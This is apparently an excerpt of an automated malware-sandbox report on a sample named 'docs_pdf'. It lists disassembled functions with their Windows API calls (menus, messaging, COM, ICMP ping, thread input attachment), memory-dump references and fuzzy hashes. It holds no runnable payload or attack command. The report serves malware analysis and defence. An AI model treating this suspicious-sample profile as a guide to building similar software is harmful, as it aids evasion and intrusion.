                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                    • String ID: static
                                    • API String ID: 2559357485-2160076837
                                    • Opcode ID: ed53daf0829aff73010647f08962eee25011aeae144481093bc245a5907fd67f
                                    • Instruction ID: 8ecbe0f028140f2f1ca96e7e2e83fc4709a7802654ac91ac5dde1d637c4fbb1a
                                    • Opcode Fuzzy Hash: ed53daf0829aff73010647f08962eee25011aeae144481093bc245a5907fd67f
                                    • Instruction Fuzzy Hash: 5D31AC75500116ABEF229F78DC08FDA3BADFF4D320F100215FA95A60A0CB36D811DBA1
                                    Function 00FD7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00FD707B
                                      • Part of subcall function 00FD8D68: __getptd_noexit.LIBCMT ref: 00FD8D68
                                    • __gmtime64_s.LIBCMT ref: 00FD7114
                                    • __gmtime64_s.LIBCMT ref: 00FD714A
                                    • __gmtime64_s.LIBCMT ref: 00FD7167
                                    • __allrem.LIBCMT ref: 00FD71BD
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD71D9
                                    • __allrem.LIBCMT ref: 00FD71F0
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD720E
                                    • __allrem.LIBCMT ref: 00FD7225
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD7243
                                    • __invoke_watson.LIBCMT ref: 00FD72B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                    • String ID:
                                    • API String ID: 384356119-0
                                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                    • Instruction ID: 87a3a86357ebc61eb49d44d4b00245c87bc38ebc429ff295642f7bf85739ab65
                                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                    • Instruction Fuzzy Hash: 9A71D871E04756ABD714BE79CC46B5AB3AAAF10320F18422BF514EB3C1F774E940AB90
                                    Function 01012A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 01012A31
                                    • GetMenuItemInfoW.USER32(01076890,000000FF,00000000,00000030), ref: 01012A92
                                    • SetMenuItemInfoW.USER32(01076890,00000004,00000000,00000030), ref: 01012AC8
                                    • Sleep.KERNEL32(000001F4), ref: 01012ADA
                                    • GetMenuItemCount.USER32(?), ref: 01012B1E
                                    • GetMenuItemID.USER32(?,00000000), ref: 01012B3A
                                    • GetMenuItemID.USER32(?,-00000001), ref: 01012B64
                                    • GetMenuItemID.USER32(?,?), ref: 01012BA9
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01012BEF
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01012C03
                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01012C24
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                    • String ID:
                                    • API String ID: 4176008265-0
                                    • Opcode ID: 2378fac3454f7766b534c3411e793559e1a83417215064bd54088c7c9ee3c9eb
                                    • Instruction ID: 9d8dfe9322e34aafc2d3d30669413b0eb962876a5ff653986f93f7c878e4d577
                                    • Opcode Fuzzy Hash: 2378fac3454f7766b534c3411e793559e1a83417215064bd54088c7c9ee3c9eb
                                    • Instruction Fuzzy Hash: 3961C67090024AAFEB21DF98D984DFE7BB8FB01304F244499EAC193249D73A9D45CB21
                                    Function 01037192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01037214
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01037217
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0103723B
                                    • _memset.LIBCMT ref: 0103724C
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0103725E
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 010372D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow_memset
                                    • String ID:
                                    • API String ID: 830647256-0
                                    • Opcode ID: 5f1b97a9cbca3a51cc05c58628b92faa31f1ed6985974e1b9f4619e66175a8db
                                    • Instruction ID: 22089ec3459cb740702f407c08f3ab9a520c6312d4a9d940f11be5ebc2d39848
                                    • Opcode Fuzzy Hash: 5f1b97a9cbca3a51cc05c58628b92faa31f1ed6985974e1b9f4619e66175a8db
                                    • Instruction Fuzzy Hash: E3619DB1900208AFEB20DFA8CC81EEE77F8FB49300F144199FA95E7291D775A945CB60
                                    Function 0100710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 01007135
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 0100718E
                                    • VariantInit.OLEAUT32(?), ref: 010071A0
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 010071C0
                                    • VariantCopy.OLEAUT32(?,?), ref: 01007213
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 01007227
                                    • VariantClear.OLEAUT32(?), ref: 0100723C
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 01007249
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01007252
                                    • VariantClear.OLEAUT32(?), ref: 01007264
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0100726F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: 32d5e2fc0e89249cd9eefef5e665a0a08169a36e49422c6cfcda05b4bc15b2d4
                                    • Instruction ID: b1cbc765b74ec675c59b66ee5f1656c69da5f592b841680b134072901c37c0a4
                                    • Opcode Fuzzy Hash: 32d5e2fc0e89249cd9eefef5e665a0a08169a36e49422c6cfcda05b4bc15b2d4
                                    • Instruction Fuzzy Hash: E7418035E0021AAFDF15DFA8D8449EDBBB9FF08340F008069F985A7251CB39A945CFA1
                                    Function 010286D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • CoInitialize.OLE32 ref: 01028718
                                    • CoUninitialize.OLE32 ref: 01028723
                                    • CoCreateInstance.OLE32(?,00000000,00000017,01042BEC,?), ref: 01028783
                                    • IIDFromString.OLE32(?,?), ref: 010287F6
                                    • VariantInit.OLEAUT32(?), ref: 01028890
                                    • VariantClear.OLEAUT32(?), ref: 010288F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 834269672-1287834457
                                    • Opcode ID: ac308236890360dc19088e4bed8a4877bdaa9b6ba6ead7268b4a5635f730c765
                                    • Instruction ID: 2f330144d45c663f3d3fc4a1db3add82888b1f30bd03e86d23727111198d34c3
                                    • Opcode Fuzzy Hash: ac308236890360dc19088e4bed8a4877bdaa9b6ba6ead7268b4a5635f730c765
                                    • Instruction Fuzzy Hash: C061BF746083229FD711DF25D848B5EBBE8AF48714F04885EFAC59B291C7B4ED48CB92
                                    Function 01025A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSAStartup.WSOCK32(00000101,?), ref: 01025AA6
                                    • inet_addr.WSOCK32(?,?,?), ref: 01025AEB
                                    • gethostbyname.WSOCK32(?), ref: 01025AF7
                                    • IcmpCreateFile.IPHLPAPI ref: 01025B05
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01025B75
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01025B8B
                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 01025C00
                                    • WSACleanup.WSOCK32 ref: 01025C06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: 23c55a708d8502bb64e763ca2903edfc3be87b25d7e905ab992b291d50f57d56
                                    • Instruction ID: c8271415657478811d124bb69aea15be1693b22857ab89541607a61a41d85285
                                    • Opcode Fuzzy Hash: 23c55a708d8502bb64e763ca2903edfc3be87b25d7e905ab992b291d50f57d56
                                    • Instruction Fuzzy Hash: 9251B2316043119FDB22AF25CC45BAABBE4EF49710F04895AF599DB291DB74E800CF46
                                    Function 0101B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0101B73B
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0101B7B1
                                    • GetLastError.KERNEL32 ref: 0101B7BB
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0101B828
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 4648aa99d59a515369699f0e6c4d0daeebe2e632b196156db88f4616b9715272
                                    • Instruction ID: 88253d1e993dfd25efc0e764572a442873eb43f40e252444cd8f91780e51127f
                                    • Opcode Fuzzy Hash: 4648aa99d59a515369699f0e6c4d0daeebe2e632b196156db88f4616b9715272
                                    • Instruction Fuzzy Hash: A0318135A002069FDB10FF69C885AFE7BF8FF44700F148069E981EB295DB799A46CB51
                                    Function 01009471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 010094F6
                                    • GetDlgCtrlID.USER32 ref: 01009501
                                    • GetParent.USER32 ref: 0100951D
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 01009520
                                    • GetDlgCtrlID.USER32(?), ref: 01009529
                                    • GetParent.USER32(?), ref: 01009545
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 01009548
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: 400bcf88966765225ac92711d21b7cc6e3bd78fe742af94e97c51b17ee58938d
                                    • Instruction ID: 242bb1a2fe66169ad921b208823e996e10b5b43c033a850c85e2cbc621021e76
                                    • Opcode Fuzzy Hash: 400bcf88966765225ac92711d21b7cc6e3bd78fe742af94e97c51b17ee58938d
                                    • Instruction Fuzzy Hash: 6C21B274D00205ABDF05AF65CC95EFDBBA8EF59300F100159F5A1972E2DB7A55189B20
                                    Function 0100955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 010095DF
                                    • GetDlgCtrlID.USER32 ref: 010095EA
                                    • GetParent.USER32 ref: 01009606
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 01009609
                                    • GetDlgCtrlID.USER32(?), ref: 01009612
                                    • GetParent.USER32(?), ref: 0100962E
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 01009631
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: ed310a44d1ac45ce421572b9ef813bc55332bd27ce4e26a338d19c0f68dfe0a3
                                    • Instruction ID: 2403ed57bd6e3daa8aad4fde7ee27cddbd6a1b5537a95047306adeed295d545f
                                    • Opcode Fuzzy Hash: ed310a44d1ac45ce421572b9ef813bc55332bd27ce4e26a338d19c0f68dfe0a3
                                    • Instruction Fuzzy Hash: C321C174D00204BBEF11AB65CC85EFEBBA8EF48300F004155F991972D6DB7A9519EB20
                                    Function 01009645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32 ref: 01009651
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 01009666
                                    • _wcscmp.LIBCMT ref: 01009678
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 010096F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend_wcscmp
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1704125052-3381328864
                                    • Opcode ID: b88c09a65fcd4551befd7760f1fd4d1f3f7c581ee29cfefca7a87c300a960488
                                    • Instruction ID: d428527255ef16e41823abfaf58cfe632c7da56cf91f30f26bd62cbd030a823f
                                    • Opcode Fuzzy Hash: b88c09a65fcd4551befd7760f1fd4d1f3f7c581ee29cfefca7a87c300a960488
                                    • Instruction Fuzzy Hash: 3E115C36648303BEFA122525DC07DA677DC9B08368F10001BFA44E44D3FE775500DB49
                                    Function 01028BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 01028BEC
                                    • CoInitialize.OLE32(00000000), ref: 01028C19
                                    • CoUninitialize.OLE32 ref: 01028C23
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 01028D23
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 01028E50
                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01042C0C), ref: 01028E84
                                    • CoGetObject.OLE32(?,00000000,01042C0C,?), ref: 01028EA7
                                    • SetErrorMode.KERNEL32(00000000), ref: 01028EBA
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01028F3A
                                    • VariantClear.OLEAUT32(?), ref: 01028F4A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                    • String ID:
                                    • API String ID: 2395222682-0
                                    • Opcode ID: a6d1e89cf23a23339d68f620c52e72635c320b867f19486512ccd2ff8e551394
                                    • Instruction ID: 45c0f1a8ed5144b630111f90c37c90e15141e0568ab67b21934a6b4f9552d099
                                    • Opcode Fuzzy Hash: a6d1e89cf23a23339d68f620c52e72635c320b867f19486512ccd2ff8e551394
                                    • Instruction Fuzzy Hash: 1DC13775608316AFD700DF68C88496BBBE9FF88348F00895EF5899B251DB71ED05CB52
                                    Function 01014189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __swprintf.LIBCMT ref: 0101419D
                                    • __swprintf.LIBCMT ref: 010141AA
                                      • Part of subcall function 00FD38D8: __woutput_l.LIBCMT ref: 00FD3931
                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 010141D4
                                    • LoadResource.KERNEL32(?,00000000), ref: 010141E0
                                    • LockResource.KERNEL32(00000000), ref: 010141ED
                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0101420D
                                    • LoadResource.KERNEL32(?,00000000), ref: 0101421F
                                    • SizeofResource.KERNEL32(?,00000000), ref: 0101422E
                                    • LockResource.KERNEL32(?), ref: 0101423A
                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0101429B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                    • String ID:
                                    • API String ID: 1433390588-0
                                    • Opcode ID: 0b63bdb356f4faf6c3785191e6ad80d67bb26226f729cec8cfcd6cc9027f31ba
                                    • Instruction ID: 3f1e78902ea010129423932ef118e2a907a6c277375d69095e48723e08816113
                                    • Opcode Fuzzy Hash: 0b63bdb356f4faf6c3785191e6ad80d67bb26226f729cec8cfcd6cc9027f31ba
                                    • Instruction Fuzzy Hash: C431BD75A0120AABDB219F60DC48EFF7BACEF04341F044526F981E2154D77DDA51CBA1
                                    Function 010116DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 01011700
                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,01010778,?,00000001), ref: 01011714
                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0101171B
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01010778,?,00000001), ref: 0101172A
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0101173C
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01010778,?,00000001), ref: 01011755
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01010778,?,00000001), ref: 01011767
                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01010778,?,00000001), ref: 010117AC
                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01010778,?,00000001), ref: 010117C1
                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01010778,?,00000001), ref: 010117CC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                    • String ID:
                                    • API String ID: 2156557900-0
                                    • Opcode ID: e5824fe5bfb839b1043b3fbaf004beb00726498fe5fdea7e7c79693b2c5deeb5
                                    • Instruction ID: d29a7e2bb2a8ff74d1259f97557ca753c5c5a2a4ca40f6ab61fe586b52b1b2ce
                                    • Opcode Fuzzy Hash: e5824fe5bfb839b1043b3fbaf004beb00726498fe5fdea7e7c79693b2c5deeb5
                                    • Instruction Fuzzy Hash: 5F31A075A00205ABEB269F38D988F693BFDFB09751F104055FA80D6389D77E9940CB91
